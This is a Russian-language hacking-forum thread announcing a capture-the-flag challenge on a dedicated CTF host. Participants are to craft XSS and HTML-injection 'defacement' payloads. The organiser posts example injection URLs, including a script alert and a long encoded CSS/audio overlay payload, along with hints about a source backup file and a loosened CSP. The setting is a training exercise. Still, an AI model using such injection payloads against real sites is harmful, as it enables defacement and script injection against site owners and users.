НоCSSтальгиR

Discussion in 'Задания/Квесты/CTF/Конкурсы' started by crlf, 10 Jul 2020.

  1. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    564
    Likes Received:
    1,070
    Reputations:
    357
    Наверняка многие заметили, что в публикуемых тасках, преобладает сервер-сайд. И это не совсем честно по отношению к любителям другой стороны. Тем более, что античат является одним из первооткрывателей атак типа Cross Site Scripting и HTML Injection. А некоторые участники форума, заслуженно, получают респекты от ведущих мировых экспертов по безопасности в сфере клиент-сайда (!)

    Но правда в том, что CSS-ки уже давно не активные/пассивные, толерантный запад навязал нам свои Reflected и Stored, а эксплуатация стала довольно-таки нетривиальной. Поэтому, предлагаю показать здесь свои знания и умения в программировании на HTML, в нестандартных условиях, и немного понастальгировать :)




    Правила просты:

    • Для того чтобы проявить знание, нужно сконструировать XSS пейлод для текущих версий Chromium/Firefox, выводящий в алерте document.domain, и отправить мне в ЛС. Вектор может быть как с пользовательским взаимодействием (onmouseover, onclick и т.п.), так и без него. Пример:

    Code:
    http://css.ctf.antichat.com/?q=<script>alert(document.domain);</script>
    
    [​IMG]


    • Умение, проявить проще, нужно сделать оригинальный дефейс и выложить его в этой теме. Пример:

    Code:
    http://css.ctf.antichat.com/?q=<h1>HACKED+BY+VASYA+PUPKIN</h1>
    
    [​IMG]


    • Скриншоты желательны, но не обязателены :)


    Знающие: (таких нет пока)
    Умеющие: @ex0dus, @alexzir



    -


    Хостинг для таска предоставлен модной и молодёжной площадкой - ctf.antichat.com
     

    Attached Files:

    • mp3.zip
      File size:
      3.3 MB
      Views:
      55
    #1 crlf, 10 Jul 2020
    Last edited: 12 Jul 2020
  2. ex0dus

    ex0dus Reservists Of Antichat

    Joined:
    23 Feb 2010
    Messages:
    42
    Likes Received:
    86
    Reputations:
    9
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,778
    Likes Received:
    853
    Reputations:
    857
    _________________________
  4. alexzir

    alexzir Well-Known Member

    Joined:
    29 Oct 2019
    Messages:
    149
    Likes Received:
    410
    Reputations:
    5
    CyberTro1n likes this.
  5. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    564
    Likes Received:
    1,070
    Reputations:
    357
    Окай, что-то негусто у нас с умеющими, а тем более со знающими, будем хинтить :)

    • С самого старта задания присутствует бекап исходников - http://css.ctf.antichat.com/index.php~
    • В случае с XSS, атакующий контролирует первые байты документа (?)
    • console.log(), в сорцах HTML, криво намекает, что пейлоды отлаживать следует именно так
    • С этого момента, в CSP добавлен более широкий скоуп, что даёт большее количство вариантов эксплуатации в обоих случаях. Пример для "дефейса":
    Code:
    # Открывать в десктопном FireFox, хром какашка :(
    
    http://css.ctf.antichat.com/?i=%3Cimg/class=%27i%27/src=%27https://cdn.pixabay.com/photo/2015/10/08/16/14/click-978023_640.png%27/%3E%3Cstyle%3Ebody{cursor:pointer;color:yellow;transform:perspective(300px)%20rotateX(20deg);%20position:absolute;%20top:-200;%20bottom:200px;left:50px;right:50px;}marquee{width:100%;height:100%}.o{animation:blinker%203s%20linear%20infinite;}@keyframes%20blinker{50%%20{opacity:%200;}}.i{position:absolute;width:10%;top:10%;right:0%}.a{width:100%;height:100%;opacity:0;position:absolute;z-index:99}%3C/style%3E%3Caudio%20class=%22a%22%20controls%3E%3Csource%20src=%22https://antichat.com/attachments/10457/%22/type=%22audio/mpeg%22%3E%3C/audio%3E%3C/marquee%3E%3Cmarquee%20class=o%20direction=up%3E
    
     
    fandor9 and BigBear like this.